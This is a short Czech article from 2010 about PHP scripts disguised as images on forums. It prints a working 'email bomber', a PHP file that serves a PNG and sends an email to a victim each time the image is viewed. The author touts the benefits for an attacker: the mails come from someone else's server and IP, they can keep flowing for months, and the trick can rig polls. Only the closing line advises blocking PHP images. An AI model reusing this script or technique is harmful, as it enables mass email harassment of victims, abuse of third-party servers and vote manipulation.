Nebezpečné php obrázky

Zdroj: SOOM.cz [ISSN 1804-7270]
Autor: Fil-kun
Datum: 7.5.2010
Hodnocení/Hlasovalo: 2.25/4

Nebezpečí php obrázků na fórech.

Tento článek píše o nebezpečí php obrázků na stránkách a fórech

Zde je příklad email bomberu:

obrazek.php <? header('Content-Type: image/png'); $img = file_get_contents('obrazek.png'); echo $img; mail("obet@obet.cz", "Hack", "Tvuj email byl hacknut!","From: utocnik@utocnik.cz"); ?>

Tento php script vypíše obrázek obrazek.png + odešle email. Nyní stačí vložit tento script ,jako obrázek na stránku nebo fórum. Poté co nějaký návštěvník zobrazí náš obrázek se odešle email. Největší výhoda je ,že se email neodesílá z vašeho počítače ,takže můžete emaily odesílat třeba 2 měsíce vkuse + ip adresa není vaše. Další využití může být třeba v anketách.

Jestliže, takový obrázek vložíte na nějaké hodně navtěvované forum ,tak následky můžou být strašlivé. Proto doporučuji php obrázky úplně blokovat.

Fil-kun